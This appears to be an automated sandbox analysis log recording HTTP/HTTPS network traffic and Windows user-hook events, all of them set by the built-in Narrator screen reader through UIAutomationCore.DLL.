Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71957d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1fGwJMkFnERm9QmVX5i6ye9S3c6KUphJTG2j2fplJdSOyHgn9fNan7uYwsQu1C89mssRuI5lXOqhlBEMaZlCmrNnXlYu%2B5Fq4akRfJeI%2BTYWQ7Qyqm9nxC2jzWOuRsdEpU984hhEdzfij5MS"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=210&recv=130&lost=0&retrans=0&sent_bytes=143992&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16599&x=0"content-length: 173
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 15:10:21 GMTcontent-type: text/html; charset=utf-8cf-ray: 946eada71966d7ac-LAXserver: cloudflarecontent-encoding: zstdcache-control: max-age=14400cf-cache-status: MISSreport-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MSNwqurk%2BkmBkXdb2vskkhKOZRZd93QP1zd%2FkvwKZaFeRhJ35TezG0h5E22zUfuRF4vo8fnx70lgc%2BtcDpeGU2qhxudmH8RWUAbMo9EQfRZhimt%2FcU6F05fU6zDFGfe5xbrdU3jMzHnd4kxP"}],"group":"cf-nel","max_age":604800}nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=165388&min_rtt=164317&rtt_var=1349&sent=214&recv=130&lost=0&retrans=0&sent_bytes=145155&recv_bytes=16153&delivery_rate=275315&cwnd=250&unsent_bytes=0&cid=43934d682e28b769&ts=16610&x=0"content-length: 169

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.17:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.123.129.254:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.218.142:443 -> 192.168.2.17:49760 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global event hook (focus changed)

Source: C:\Windows\System32\Narrator.exe

Windows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULL

Installs a global keyboard hook

Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 0 keyboard low level C:\Windows\System32\Narrator.exe
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 5128 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 5128 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 5128 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 5128 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
